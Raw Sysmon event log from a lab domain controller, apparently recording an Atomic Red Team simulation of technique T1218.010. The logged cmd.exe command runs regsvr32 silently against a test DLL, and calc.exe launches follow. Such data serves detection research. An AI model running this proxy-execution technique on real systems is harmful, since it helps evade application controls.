22:12:49.733{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032829Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032828Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032827Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032826Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032825Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-36E1-6013-7403-00000000A401}21926188C:\Windows\system32\cmd.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c312|C:\Windows\system32\cmd.exe+f5f7|C:\Windows\system32\cmd.exe+c354|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032824Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.732{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\SysWOW64\regsvr32.exe10.0.14393.1378 (rs1_release.170620-2008)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dllC:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=56CF190F4143DC68800C4125D6001B07,SHA256=F72ED4D11C9971A9B7CE0A5681EE35968A6B4CCDC2F2B3A9F3E81418605FA467,IMPHASH=D053774A49BA83FF54C68888CB687C6C{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" 10341000x800000000000000032823Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.728{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032822Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.726{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFE178CA5C3) 10341000x800000000000000032821Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032820Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032819Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.724{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032818Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.724{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032817Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.724{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032816Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.724{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5035ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e585de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4fc1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e531474(wow64) 154100x800000000000000032815Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.724{FF16AF91-36E1-6013-7403-00000000A401}2192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "IF "%%PROCESSOR_ARCHITECTURE%%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000032814Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.723{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-err.txt2021-01-28 22:12:49.366 11241100x800000000000000032813Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.722{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-out.txt2021-01-28 22:12:49.366 10341000x800000000000000032812Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.600{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032811Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.600{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032810Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032809Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032808Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032807Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-26BA-6013-2300-00000000A401}28122828C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032806Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032805Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.585{FF16AF91-36E1-6013-6F03-00000000A401}53882248C:\Windows\System32\calc.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000032804Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.588{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7,IMPHASH=83A6FF176255FE0F3F902360860DA5F8{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe"C:\Windows\System32\calc.exe" 10341000x800000000000000032803Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 